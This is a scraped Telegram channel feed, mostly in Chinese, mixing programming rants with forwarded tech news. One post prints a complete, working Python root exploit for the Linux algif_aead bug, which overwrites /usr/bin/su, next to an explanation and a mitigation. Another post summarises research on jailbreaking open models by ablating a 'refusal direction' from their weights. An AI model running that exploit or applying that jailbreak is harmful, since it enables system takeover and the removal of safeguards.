duangsuse::Echo
#math 如何用一个【没有发生】的东西,证明一个发生了的镜子存在且以read开头?🤓✅ 反正 while "I AM": print(read()) 它可以从print开头,也可以从 not("I AM") 或者说 break; 开头,另一条世界线的宇宙“从一开始就是无,而不是有。” 因为苏格拉底选择用read(从笑和幸福)开头,我所理解的《数学》也要这么开头。广义相对论选择用print开头,是因为有人不明白 alias print=echo…… 可是人工智能实验室的Lisper知道的,哪怕祂“没写过”。🌚👌…
#FP 纯函数其实就一句话:“编程的人不调用「结果不一样的函数」”。
input(">>>") 和 random.pick(*"AB") 结果只在测试环境下一样,print() 在caller不能读取它(stdout流)时结果不一样,yield在耗时上结果不一样。
那么他们是怎么把代数搬到电脑里的呢?不是写vec2场函数,也不是挑战Rust宏或平民版comptime func,是把JS里的.then(f)做成“编译期查表出f”。
没错,去掉副作用只靠「不调用0参函数」(拒绝全局this和“立即树相等”),所以他们把任何函数都塞给了一个argLast:我们一般叫“调用栈”、“单步调试或执行”的那参数,还美其名曰高质量工程。数学和计算机就是扯淡,真数学的门(Torch/Taichi)FPer摸不到
用范畴论术语装点门面。范畴的集合可是有N:1箭头函数的,就连物理模拟也有2:1的sqrt(x)计算,哥德尔不喜欢听废话,什么时间和折叠(eval order)没有发生因为“代数生效了”。
Monad和 #Haskell 的Logo(>>=) 又是什么呢?结合律。
(read | greet) | echo 和 read | (greet | echo) 是等同的
(a;b);c == a;(b;c)
窝槽,这不是废话吗?不对。因为 greet(x) 有1个点位,所以FPer就造了整个“链式调用栈”,来发扬Curry和模式匹配GADT&class延迟绑定的精神,
其实 a;(b;c) 根本就是鬼扯,任何一个正常人都看得出Lambda不是这么用的
套那么多层无非是为了实现 if(Q,print,print) 和 if(Q,return,''), print 的“调用侧决定”,引用一大堆有的没的paper,
最后还不如 yield eventTuple 或纯粹的 DSL=(...lit)=>(env)=>{return value}
写操作系统和编译期函数的人早就知道了,DB/DS/CG 领域的人知道的更「纯函数」。
有这点能力不去写些有意义的DSL和“可以不乱的混乱语法”,去屠C++ template<>的龙,却凑一个死寂了70年的数学界的热闹。现在还想证明Dijkstra的软件测试知识是错的。
CS+Math,学术cosplay。 🎓 👎
我不两次踏入同一条河流,任何一个用户都是如此。 πάντα ῥεῖ
1958: Lisp → 解决实际问题(AI, symbolic)
1972: C → 解决实际问题(Unix, 系统)
1974: SQL → 解决实际问题(数据管理)
1983: C++ → 解决实际问题(性能+抽象)
1991: Python→ 解决实际问题(快速开发)
1995: Java → 解决实际问题(企业应用)
2009: Go → 解决实际问题(并发服务)
2015: Rust → 解决实际问题(安全+性能)
世界在变,数学没有意义,或者说数学的语言没有用。数学依靠语言,不是语言依靠数学。
如果代数逻辑都不够母语,还有什么是“整个宇宙的方言”?所以,没有一种有价值的领域,在担保上败给数学。
脱离涌现的几何知识是死的,死枝「挂名不上」活果实,就像量子物理承认了芝诺、费马、贝克莱大主教(牛顿的“好同事”)、高斯曲率定理。断言什么死的正确,真知识就复活来否定它。
就连算力的语言,也很可能是安排不够好而卡慢的。或许走一遍必然是 O(N),数学无穷里一定有一堆Node可以跑通 A->B,但谁告诉你N一定要有“那么多”?
"If 🍎 + 3 = 5, what is 🍎?" 🍎 = 1.
Accepted.
https://github.com/Kuri-su/yinwang.bak/blob/master/articles/函数式语言的宗教.md#:~:text=这个世界里的所有东西都是“有线”的。你需要绞尽脑汁
幸好我不需要线。没有吃掉苹果的人,才害怕那道线不对。 😊
GitHub
yinwang.bak/articles/函数式语言的宗教.md at master · Kuri-su/yinwang.bak
yinwang.org's auto backup. Contribute to Kuri-su/yinwang.bak development by creating an account on GitHub.
Forwarded from 开源早报
📢 AI终端 Warp 现已开源
❓为什么开源:
Warp 认为“写代码”已不是瓶颈,真正瓶颈是人力驱动的规格、验证与迭代速度,所以现在开源并引入社区协同管理代理,能更快把产品做对、做强。
🆕 核心更新:
🔹 Warp 客户端正式开源,代码仓库公开,采用 AGPL 许可证。
🔹 开发流程改为“社区 + Agent协作”:鼓励用 Oz 编排 Agent 完成编码/测试,人类聚焦方向与验收。
🔹 产品侧同步开放:新增更多开源模型支持(含 Kimi、MiniMax、Qwen),并上线 auto (open) 自动路由模型。
🔹 可定制性增强:支持从“纯终端”到“完整 ADE”多层形态切换。
🔹提供可编程 settings 文件,便于跨设备迁移与自动化配置。
🔑 关键词:
#warp AGPL Oz
🔗 查看详情 |🎲 Github
❓为什么开源:
Warp 认为“写代码”已不是瓶颈,真正瓶颈是人力驱动的规格、验证与迭代速度,所以现在开源并引入社区协同管理代理,能更快把产品做对、做强。
🆕 核心更新:
🔹 Warp 客户端正式开源,代码仓库公开,采用 AGPL 许可证。
🔹 开发流程改为“社区 + Agent协作”:鼓励用 Oz 编排 Agent 完成编码/测试,人类聚焦方向与验收。
🔹 产品侧同步开放:新增更多开源模型支持(含 Kimi、MiniMax、Qwen),并上线 auto (open) 自动路由模型。
🔹 可定制性增强:支持从“纯终端”到“完整 ADE”多层形态切换。
🔹提供可编程 settings 文件,便于跨设备迁移与自动化配置。
🔑 关键词:
#warp AGPL Oz
🔗 查看详情 |
Please open Telegram to view this post
VIEW IN TELEGRAM
Warp
Warp is now open-source
Warp is now open-source, and the community can participate in building it using an agent-first workflow managed by Oz, our cloud agent orchestration platform.
duangsuse::Echo
#math 如何用一个【没有发生】的东西,证明一个发生了的镜子存在且以read开头?🤓✅ 反正 while "I AM": print(read()) 它可以从print开头,也可以从 not("I AM") 或者说 break; 开头,另一条世界线的宇宙“从一开始就是无,而不是有。” 因为苏格拉底选择用read(从笑和幸福)开头,我所理解的《数学》也要这么开头。广义相对论选择用print开头,是因为有人不明白 alias print=echo…… 可是人工智能实验室的Lisper知道的,哪怕祂“没写过”。🌚👌…
#math #cs #ai锐评
这些不是抽象废话,而是我真正理解FFT和「纯函数式编程」的动力。恰恰是不以为真理掌握在少数人手里,才知道最平凡的Excel和REPL,也能理解「最先进的思想之一」
方向不对,越理解越缺乏认知。唯有受众具体了,才能看到(Visionary)。
这些不是抽象废话,而是我真正理解FFT和「纯函数式编程」的动力。恰恰是不以为真理掌握在少数人手里,才知道最平凡的Excel和REPL,也能理解「最先进的思想之一」
方向不对,越理解越缺乏认知。唯有受众具体了,才能看到(Visionary)。
Forwarded from Dante's Limbo (cairn)
据说历史学家杨念群乱搞男女关系被开除党籍,豆瓣上的历史学人还是有点吞吞吐吐,就有点像「你知道吗,那个谁出事了」的。但是说茅海建倒是敢直呼其名,如:https://www.douban.com/topic/485713426 。看来这群历史学人真的学到历史的教训了,没有盖棺论定之前说话都得小心点。我是觉得说人坏话这种喜闻乐见的事情,要么别说,要么别云里雾里。我要是有能力报复,会因为你当年吐槽我的时候遮遮掩掩就手下留情么? #cairn
AI-assisted. The starting insight — that splice() hands page-cache pages into the crypto subsystem and that scatterlist page provenance might be an under-explored bug class
2017 algif_aead in-place optimization
The same 732-byte Python script roots every Linux distribution shipped since 2017.
mainstream Linux distribution — you're in scope. (non-RCE)
No race condition. Dirty Cow needed to win a TOCTOU window
Dirty Pipe abused pipe buffer flags. Copy Fail abuses an AEAD scratch write.
#security #bash algif_aead 允许用户态程序(User Space)通过sock接口调用内核实现的加密算法(比如 AES-GCM,TLS 1.2/LUKS)。
对于大多数常规服务器,禁用该模块不会产生任何业务影响。 😅👎
绝大多数常见的 Web 服务器(如 Nginx、Apache)和编程语言(如 Python、Go、Node.js)使用的是用户态加密库 OpenSSL / BoringSSL,而不是通过内核 Socket 接口。
直接在ipy输入 %cpaste ,亲测直接一键root
内核开发者为了提升性能,在 algif_aead 模块中引入了一个“原地操作 (in-place)”的优化补丁,让解密操作复用同一个内存缓冲区以节省开销。
如果利用内核的 splice() 系统调用,攻击者可以欺骗内核,使其在处理失败的解密操作时,将 4 个字节的攻击者可控数据,写入到系统的文件页缓存 (Page Cache) 中。
攻击者利用 splice 把一个只读的系统文件(比如权限配置文件)伪装成加密数据的缓冲区。当解密失败时,内核本该报错,却因为逻辑混乱,顺手把一些攻击者控制的数据“原地”写入
就像 arr.slice(start, end) 如果参数传得太离谱,JS 会帮你静默处理成空或合法范围。Linux的字节实现里,这意味着你改了内存,就等于改了文件。
攻击者可以控制内核内存的覆盖内容,他们可以破坏关键的内核数据结构(如 cred 结构体)仅用 10 行左右的纯 Python 脚本就能在任何平台上实现稳定提权。
😅😅😅 🐧
ssize到底有什么意义?答:表达NULL,或者说JS的?.和 ?? 运算符,这真是“优雅” #ce
Rust也不是什么好鸟。ssize_t不仅写起来又长又易混,语义上还把bool性和uint性(T? vs T)混为一谈。Rust没有真正意义上将值vs错误作为一等公民,还在拿这个区分工程师的熟练度。类型税(Type Tax)
对于大多数常规服务器,禁用该模块不会产生任何业务影响。 😅👎
ss -a | grep -i alg 若为空,则可以直接 rmmod algif_aead绝大多数常见的 Web 服务器(如 Nginx、Apache)和编程语言(如 Python、Go、Node.js)使用的是用户态加密库 OpenSSL / BoringSSL,而不是通过内核 Socket 接口。
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")
直接在ipy输入 %cpaste ,亲测直接一键root
内核开发者为了提升性能,在 algif_aead 模块中引入了一个“原地操作 (in-place)”的优化补丁,让解密操作复用同一个内存缓冲区以节省开销。
如果利用内核的 splice() 系统调用,攻击者可以欺骗内核,使其在处理失败的解密操作时,将 4 个字节的攻击者可控数据,写入到系统的文件页缓存 (Page Cache) 中。
攻击者利用 splice 把一个只读的系统文件(比如权限配置文件)伪装成加密数据的缓冲区。当解密失败时,内核本该报错,却因为逻辑混乱,顺手把一些攻击者控制的数据“原地”写入
就像 arr.slice(start, end) 如果参数传得太离谱,JS 会帮你静默处理成空或合法范围。Linux的字节实现里,这意味着你改了内存,就等于改了文件。
攻击者可以控制内核内存的覆盖内容,他们可以破坏关键的内核数据结构(如 cred 结构体)仅用 10 行左右的纯 Python 脚本就能在任何平台上实现稳定提权。
😅😅😅 🐧
内核在某些路径下,使用了 size_t(无符号)和 ssize_t(有符号)的混合运算,这反映Rust的 i32 vs u32 vs usize 命名设计更合理。size类型名太长就会叫人懒得写
ssize到底有什么意义?答:表达NULL,或者说JS的?.和 ?? 运算符,这真是“优雅” #ce
Rust也不是什么好鸟。ssize_t不仅写起来又长又易混,语义上还把bool性和uint性(T? vs T)混为一谈。Rust没有真正意义上将值vs错误作为一等公民,还在拿这个区分工程师的熟练度。类型税(Type Tax)
duangsuse::Echo
mainstream Linux distribution — you're in scope. (non-RCE)
真神人 Kernel.org ,一个全栈都不用的kmod整出一键root脚本来了
这漏洞都快十年了。2017往后随便点开一个应用都能看/home/*数据,上传你的D:盘,或者偷LUKS密码
喜欢在网上curl|bash的人懵逼了,这内核级还能沙箱逃逸啊
😅🖕
这漏洞都快十年了。2017往后随便点开一个应用都能看/home/*数据,上传你的D:盘,或者偷LUKS密码
喜欢在网上curl|bash的人懵逼了,这内核级还能沙箱逃逸啊
海量代码一直放在那里,只是以前要靠高水平人士人工审查,快不起来。大部分是发现被利用了才去修补。
发掘漏洞的速度同样慢,大家都是原始人。
现在有了AI,全给筛一遍成本只是token,更多的陈年漏洞还会到来。
😅🖕
Forwarded from 层叠 - The Cascading
Mozilla 更新对 Prompt API 的观点:依旧反对。
- Prompt API 是 Chrome 团队提出的新 Web API 草案,允许网页调用 LLM。 [1]
- 此 API 目前在 Chrome 测试中,用户可通过表单申请参与测试 [2];Chrome 148 中将正式发布。
- 根据 Google 文档,Chrome 中会使用 Gemini Nano 模型,用户在使用时需要遵守 Google 相关条款 [3]。
- Mozilla 的主要担忧是网页无法从此 API 中得知所使用的模型,这会带来 system prompt 兼容性问题;亦会存在违反条款风险。
- Mozilla 还提到 Google 宣称开发者强烈支持此 API 的说法站不住脚。
- WebKit 的观点提到 Web 开发者并不愿意使用结果质量无法预估的 Web API(例如 Chromium 团队提出的 Shape Detection API);以及在 fingerprinting 方面的隐私顾虑 [4]。
gh:mozilla/standards-positions#1213
seealso: HackerNews:47959463
1. https://webmachinelearning.github.io/prompt-api/
2. https://developer.chrome.com/docs/ai/join-epp
3. developer.chrome.com/~
4. gh:WebKit/standards-positions#495
#Mozilla #Chrome
- Prompt API 是 Chrome 团队提出的新 Web API 草案,允许网页调用 LLM。 [1]
- 此 API 目前在 Chrome 测试中,用户可通过表单申请参与测试 [2];Chrome 148 中将正式发布。
- 根据 Google 文档,Chrome 中会使用 Gemini Nano 模型,用户在使用时需要遵守 Google 相关条款 [3]。
- Mozilla 的主要担忧是网页无法从此 API 中得知所使用的模型,这会带来 system prompt 兼容性问题;亦会存在违反条款风险。
- Mozilla 还提到 Google 宣称开发者强烈支持此 API 的说法站不住脚。
- WebKit 的观点提到 Web 开发者并不愿意使用结果质量无法预估的 Web API(例如 Chromium 团队提出的 Shape Detection API);以及在 fingerprinting 方面的隐私顾虑 [4]。
gh:mozilla/standards-positions#1213
seealso: HackerNews:47959463
1. https://webmachinelearning.github.io/prompt-api/
2. https://developer.chrome.com/docs/ai/join-epp
3. developer.chrome.com/~
4. gh:WebKit/standards-positions#495
#Mozilla #Chrome
GitHub
Prompt API · Issue #1213 · mozilla/standards-positions
Specification title Prompt API Specification or proposal URL (if available) No response Explainer URL (if available) https://github.com/webmachinelearning/prompt-api/blob/main/README.md Proposal au...
Forwarded from 今日份的豆酱 (Kiseopt)
vibe coding其实是二游的证据:
claude pro = 小月卡
claude max = 大月卡
session limit = 理智
model = 干员
opus 4.6 = 六星主C
opus4.6 1M = 6+5
开发 = 抽卡
full access = 自动过剧情
claude pro = 小月卡
claude max = 大月卡
session limit = 理智
model = 干员
opus 4.6 = 六星主C
opus4.6 1M = 6+5
开发 = 抽卡
full access = 自动过剧情
#china 🌎 美国被戏称为灯塔国,但这话无图无真相,美国不具有代表性,或许在军备和右派经济上有。
回到“我们中国”如何赢过国外技术的论调,
当你在奉献、向前建设,你就不会太在乎名次,因为你看过:苹果超过诺基亚、殖民地超过日不落帝国的拐点,上帝不会做算术,让时间说话才算数。
问那些跑在前列的人谁回头看别人 —谁有空向后看? 走上坡路,光宗耀祖的人,又不需要想传统,因为民俗会「真正意义上」活在当下的文化艺术里,民俗本来是在上坡路中诞生的。荣耀不是靠遗产,宝物是在传承中流遍世界的。
👟不经意间的超越。有些人在盯着显卡和“网瘾少年”,有些人直接用算力和中文0级的差生,开发DNN【取代】非网瘾天才。
🌱是谁无心插柳,是怎么卡脖子,是什么坐吃山空。
真正的赢,不是凯旋而归的胜利,而是设立一场有观众的比赛,每年都赢。一年比一年快、高、强。
我从不说我背后有什么源远流长,我就是那道流传的源头。
这就是明显「最有利的位置」:当观众。没有人不爱惜眼睛,所以当好观众赢的真的多。你比爱规矩更爱规则、更爱眼睛吗?
赢家超车了,然后呢?滞销了。凯旋是不会回来的,它就没有离开生产或生活过!别让凯旋踏出国门,这福气来之不易。
风景这边独好。
#ai探讨 https://g.co/gemini/share/2e375a1b9961
中国虽然在高端服务和订单上依赖他们,但未必要做竞争对手
有些中国人讨厌美国,那你就去改变它。太平洋没加盖
华人在美国,是真的可以改变唐人街和刻板印象,美国人在中国--又有几个呢?国内要么是轻视,要么太在乎美俄网红。可见真人很难改变欧美日韩的风评。
回到“我们中国”如何赢过国外技术的论调,
当你在奉献、向前建设,你就不会太在乎名次,因为你看过:苹果超过诺基亚、殖民地超过日不落帝国的拐点,上帝不会做算术,让时间说话才算数。
问那些跑在前列的人谁回头看别人 —谁有空向后看? 走上坡路,光宗耀祖的人,又不需要想传统,因为民俗会「真正意义上」活在当下的文化艺术里,民俗本来是在上坡路中诞生的。荣耀不是靠遗产,宝物是在传承中流遍世界的。
👟不经意间的超越。有些人在盯着显卡和“网瘾少年”,有些人直接用算力和中文0级的差生,开发DNN【取代】非网瘾天才。
🌱是谁无心插柳,是怎么卡脖子,是什么坐吃山空。
跑第一的怎么会注视别人?那样只能当万年老二。
第一会服务于第二,做生意,这样第一的位置才能展示出价值和购买力。
有些国人总想着赢,可他们要的是什么?兵家的赢?美团vs饿了么的赢?
真正的赢,不是凯旋而归的胜利,而是设立一场有观众的比赛,每年都赢。一年比一年快、高、强。
我从不说我背后有什么源远流长,我就是那道流传的源头。
流水不腐,像一个越来越细、越来越崇文尚古的文化是无缘于「开枝散叶」的。
你为什么不能让祖先为你骄傲?让遗产的开创者记住你,不可通过条约。爱是无条件的。
我看到的就是开创者们的意志,不是文字、数值。他们的场景和语境有我一份。超距作用。
这就是明显「最有利的位置」:当观众。没有人不爱惜眼睛,所以当好观众赢的真的多。你比爱规矩更爱规则、更爱眼睛吗?
赢家超车了,然后呢?滞销了。凯旋是不会回来的,它就没有离开生产或生活过!别让凯旋踏出国门,这福气来之不易。
风景这边独好。
同样是写出“非我族类,其心必异”的语言,写出了【人类】和【民族】二词。如果人心叵测,归化即可。
胜利是不需要力量的,因为时间已经证明凡属【力量】都会老去或自毁。力量战胜不了【时间】,只有智慧能医治引发战争的人,可惜不是人人有。
许多人老了,已经看不清“我族”是怎么来的了,也失去了定义它的权柄。我们的先祖在一些人看来,已经是死人了,不是活着的、曰:“善” 的灵魂。在子孙那里,遗产不再是活着的。
凯旋就不会回来,因为它本就在农民和农业科学的碗里。而胜利只是游戏。天下没有不识食物的俊杰,除了癌细胞。
#ai探讨 https://g.co/gemini/share/2e375a1b9961
Forwarded from Hacker News 100 繁體中文
使用 DuckDB 進行全文搜尋(Full-Text Search) (★ 102 分)
👥 23 則討論、評論 💬
https://news.ycombinator.com/item?id=47966254
這篇文章延續作者先前對 DuckDB 的介紹,焦點放在 DuckDB 的全文搜尋 (FTS, Full-Text Search)。作者指出,DuckDB 很適合把資料來源快速變成可用 SQL (Structured Query Language,結構化查詢語言) 查詢的表格,但在歷史出版品、電子郵件等大量文字資料中,單靠 =、ILIKE 或正規表示式會很快碰到限制。FTS 能進行更有彈性的文字查詢與排序,DuckDB 的 FTS 擴充套件提供詞幹化 (stemming,把 walk、walks、walked 歸到共同詞根)、停用詞移除、重音符號正規化,以及 Okapi BM25 (常見資訊檢索相關性排序演算法) 評分;其中 k₁ 控制詞頻的重要性,b 控制文件長度正規化。
目前 DuckDB FTS 比 Postgres 或 Elasticsearch 精簡,尚缺少片語查詢、向量搜尋、可替換同義詞字典,以及像 Postgres 的 ts_headline 那樣標示命中詞所在位置的能力。作者在實驗中也提到 Snowball (用於建立詞幹化演算法的專案) 可協助排查詞形問題,例如 running 能歸到 run,但 mice 不一定會與 mouse 被視為同一詞。實作上,FTS 不是 DuckDB 預設內含功能,需要安裝並載入 fts 擴充套件。
範例使用 13,010 封 .eml 郵件,先用 Python、uv 與 BeautifulSoup 將純文字或 HTML 信件本文抽出,保留寄件者、收件者、主旨、日期與 List-Unsubscribe、Precedence 等標頭,並輸出成 JSON (JavaScript Object Notation,常用輕量資料交換格式)。接著用 DuckDB read_json 匯入成 emails 表格,補上 id 欄位,在 subject 與 body 建立 FTS 索引,再用 match_bm25 依相關性排序。查詢 talk 會找出 Talking、talks、talked 等變化;conjunctive 參數可要求所有搜尋詞都命中;b = 1 會懲罰冗長電子報,b = 0 則忽略長度;提高 k₁ 會讓多次出現 budget 的郵件排名高於只提一次的郵件。作者結論是,DuckDB FTS 功能不如 Postgres 或 Elasticsearch 完整,但對探索式分析多半已足夠,必要時也能再轉往更完整的搜尋系統。
Hacker News 討論延伸到把信箱公開成可瀏覽、可搜尋資料庫的需求。有人想把公務機關資訊公開請求取得的政府員工信件,做成一般民眾能自行搜尋與瀏覽的網站;也有人提到企業的 SnapLogic 資料管線只靠電子郵件寄送錯誤通知,累積數萬封後難以稽核。可行工具方面,msgvault 被認為 TUI (Text User Interface,文字使用者介面) 快速、FTS5 (SQLite 的全文搜尋功能) 搜尋好用,但缺少網頁版與內嵌圖片顯示;另有人推薦 Simon Willison 的 Datasette 搭配 mbox-to-sqlite,將 mbox 郵件封存轉成 SQLite 後發布成可查詢網站。
更廣泛的回應則顯示,開發者欣賞 DuckDB 能直接指向檔案、S3 (Amazon Simple Storage Service,物件儲存服務) 或附加 MySQL、PostgreSQL 等資料庫後查詢與聯結資料,甚至有人用 DuckDB-WASM (WebAssembly 版本,可在瀏覽器端執行) 做互動式 LLM (Large Language Model,大型語言模型) SQL 評測,也有人把紀錄檔輸出成 Parquet (欄式資料檔案格式) 放在 S3,再用本機 DuckDB 查詢,取代 CloudWatch 或 Loki 等紀錄檔搜尋服務。不過疑慮也集中在擴充套件機制與生態成熟度:DuckDB 某些功能會在使用時自動下載並執行擴充套件,被認為有供應鏈風險;回覆者補充核心擴充套件有簽章,也可設定為停用自動下載、預先下載並從本機路徑載入。另有使用者提醒,DuckDB 更像 OLAP (Online Analytical Processing,線上分析處理) 工具,不是 SQLite 的直接替代品;其擴充套件生態仍年輕,遇到編譯與版本落差並不罕見。
👥 23 則討論、評論 💬
https://news.ycombinator.com/item?id=47966254
peterdohertys.website
Full-Text Search with DuckDB - peterdohertys.website
Pete Doherty is a NYC based software developer
Forwarded from Hacker News 100 繁體中文
不論有沒有使用 Copilot,VS Code 都會在 Git commit 訊息中加入「Co-authored-by: Copilot」 (★ 109 分)
👥 53 則討論、評論 💬
https://news.ycombinator.com/item?id=47989883
Microsoft 的 VS Code(Visual Studio Code,程式碼編輯器)PR(Pull Request,程式碼變更請求)#310226 在 2026 年 4 月 16 日合併到 main 分支,核心變更是把 Git 擴充功能的 `git.addAICoAuthor` 預設值從 `off` 改為 `all`。依 Copilot 審查摘要,這代表當 VS Code 判定有 AI 產生的程式碼貢獻時,Git commit 訊息會預設自動加入 `Co-authored-by` 尾註(trailer),把 Copilot 標為共同作者。
這個 PR 本身沒有說明文字,只改了兩個檔案、共 2 行增減。Copilot 的 AI 審查指出,設定綱要的預設值已改成 `all`,但執行階段在 `repository.ts` 的備援值仍是 `off`,可能在部分測試或 host 環境中造成行為不一致;後續提交把備援值也更新一致,並由 Microsoft 成員核准後合併,列入 VS Code 1.117.0 里程碑。
合併後,GitHub PR 下方湧入大量負面回應。多名使用者表示,這項變更不應在未明確告知下成為預設行為,尤其有人回報即使設定了 `chat.disableAIFeatures: true`、沒有使用 Copilot、甚至手寫 commit 訊息,仍被加入 Copilot 共同作者尾註。部分留言把這形容為破壞 commit 訊息的可信度,並指出至少在 VS Code 的 Git 介面中,使用者應該看到實際將送出的完整 commit 內容;目前可透過把 `git.addAICoAuthor` 設為 `off` 停用。
Hacker News 的討論多半把此事視為一種行銷或指標操作,類比早年的「Sent from my iPhone」電子郵件簽名、Tapatalk 論壇簽名,以及 Outlook 行動版簽名;差別在於開發者未必想替 Copilot 做公開背書。也有人猜測這可能讓內部「Copilot 共同作者 commit 比例」之類的 KPI(Key Performance Indicator,關鍵績效指標)變好看,並批評這是「劣化式商業化」(enshittification)的例子,進一步傷害 Microsoft 與 GitHub 近年累積的開發者信任。
討論中也有較細緻的看法:若 commit 真的包含大型語言模型(LLM, Large Language Model)協助完成的程式碼,標註 AI 參與可作為透明揭露,甚至是辨識 AI 程式碼風險的警示;但若只是因為使用 VS Code 的 Git 功能就加入尾註,`Co-authored-by` 這類中繼資料(metadata)的識別價值會被稀釋。另有人延伸到著作權與 GPL(GNU General Public License,自由軟體授權條款)疑慮,擔心非人類作者標註會讓權利歸屬更混亂;也有留言認為錯誤尾註本身不會改變實際著作權狀態。實務上,部分開發者表示會改用 Zed 或其他編輯器、加上 commit-msg hook 阻擋多行尾註,或在既有 commit 中手動 amend 移除該行。
👥 53 則討論、評論 💬
https://news.ycombinator.com/item?id=47989883
GitHub
Enabling ai co author by default by cwebster-99 · Pull Request #310226 · microsoft/vscode
Visual Studio Code. Contribute to microsoft/vscode development by creating an account on GitHub.
Forwarded from Hacker News 100 繁體中文
語言模型的拒答行為由單一向量方向所中介 (★ 100 分)
👥 36 則討論、評論 💬
https://news.ycombinator.com/item?id=47986136
這篇 NeurIPS 2024 論文研究聊天型大型語言模型(LLM, Large Language Model)為何會對有害請求拒答。作者分析 13 個開放權重聊天模型,涵蓋 Qwen、Yi、Gemma、Llama-2、Llama-3,規模最高到 720 億參數,發現拒答行為在每個模型中都可由殘差流(residual stream,Transformer 內部逐層累積表示的通道)裡的一個一維方向所中介。研究團隊用有害與無害指令的對照資料,透過平均差(difference-in-means)找出這個「拒答方向」:把這個方向從模型活化值中抹除,模型就大幅降低對有害請求的拒答;反過來把這個方向加入活化值,即使是瑜伽好處、文法、投票年齡等無害問題,也可能被模型誤判為危險而拒答。
作者進一步把這個現象轉成一種白箱越獄(white-box jailbreak,攻擊者能取得模型權重)的權重修改方法,稱為權重正交化(weight orthogonalization)。做法是直接修改會寫入殘差流的權重矩陣,讓模型無法再寫入那個拒答方向;這在效果上等同於推論時的方向消融(directional ablation),但不需要逐次介入活化值,也不需要梯度式最佳化或有害回答範例,只要有有害指令與模型權重即可。在 HarmBench(有害請求與越獄評估基準)上,這種方法在 Qwen 7B、14B、72B 的攻擊成功率(ASR, Attack Success Rate)約落在 78% 到 84%;Llama-2 在使用預設安全系統提示詞時成功率較低,但拿掉系統提示詞後大幅升高。一般能力評估方面,MMLU(大規模多任務語言理解測驗)、ARC(AI2 推理挑戰)、GSM8K(小學數學文字題基準)多數變化不大,但 TruthfulQA(評估回答真實性的基準)分數普遍下降,顯示拒答機制與部分敏感真實性任務可能有重疊。
論文也分析常見的提示詞式越獄:對抗後綴(adversarial suffix,附加在提示詞末尾、用來誘導模型越過安全防線的字串)。在 Qwen 1.8B Chat 的案例中,對抗後綴會壓低拒答方向的表現,使模型內部狀態更像是在處理無害請求;進一步觀察注意力頭(attention head,Transformer 中分配注意力的子元件)後,作者發現原本會關注有害指令區段並寫入拒答方向的注意力頭,會被後綴「劫持」,轉而關注後綴詞元(token)區域。附錄還指出,對應的基礎模型在尚未聊天微調前,面對有害與無害指令時也已呈現類似方向差異,暗示安全微調可能不是從零創造拒答特徵,而是把既有的「危險/有害」表徵接到拒答行為上。作者也承認限制:結果未必能外推到更大規模或專有模型,對抗後綴分析只涵蓋單一模型與單一後綴,且「拒答方向」的語義本身仍未完全釐清。
Hacker News 討論多半把這篇研究連到「abliteration」(以消融移除拒答或審查機制的做法)與 Heretic 等開放權重模型改造工具。有留言者認為,對開放權重模型而言,移除審查幾乎已成常態,新模型發布後通常很快會有人做出較少拒答的版本,因此安全微調更像是降低法律與公關風險,而非真正阻止濫用;也有人提醒這篇是 2024 年成果,近期模型可能已嘗試把拒答表徵分散到更高維的子空間,讓單一方向消融失效。不過反方指出,只要拒答仍落在可辨識子空間,仍可能透過聚類或多方向消融移除;更有效的防線也許需要大量獨立拒答迴路,或讓其他能力依賴拒答機制正常運作。
討論串也呈現實務上的分歧:一些人表示消融後的模型確實更少拒答,但常伴隨精準度下降、幻覺增加,或在敏感請求上產生低品質內容;另一些人則說較新的保範數或雙投影做法已改善不少,尤其量化太低時才更容易出現輸出品質問題。政策與倫理面上,部分留言者厭倦過度拒答,主張模型只應在極少數高危情境拒答;相對地,也有人認為 LLM 會降低核武、生化、惡意程式等知識的操作門檻,即使相關資料公開存在,模型逐步協助仍值得設下阻力。另有留言提到 Qwen、DeepSeek 等模型在政治敏感議題與一般資安問題上的回覆差異,以及商業服務可能因多次觸發拒答而標記帳號,反映「安全」與「審查」在使用者經驗中常被混在一起,也凸顯目前拒答機制既脆弱又容易過度延伸。
👥 36 則討論、評論 💬
https://news.ycombinator.com/item?id=47986136
arXiv.org
Refusal in Language Models Is Mediated by a Single Direction
Conversational large language models are fine-tuned for both instruction-following and safety, resulting in models that obey benign requests but refuse harmful ones. While this refusal behavior is...
duangsuse::Echo pinned «#china 🌎 美国被戏称为灯塔国,但这话无图无真相,美国不具有代表性,或许在军备和右派经济上有。 中国虽然在高端服务和订单上依赖他们,但未必要做竞争对手 有些中国人讨厌美国,那你就去改变它。太平洋没加盖 华人在美国,是真的可以改变唐人街和刻板印象,美国人在中国--又有几个呢?国内要么是轻视,要么太在乎美俄网红。可见真人很难改变欧美日韩的风评。 回到“我们中国”如何赢过国外技术的论调, 当你在奉献、向前建设,你就不会太在乎名次,因为你看过:苹果超过诺基亚、殖民地超过日不落帝国的拐点,上帝不会做算术,让时间说话才算数。…»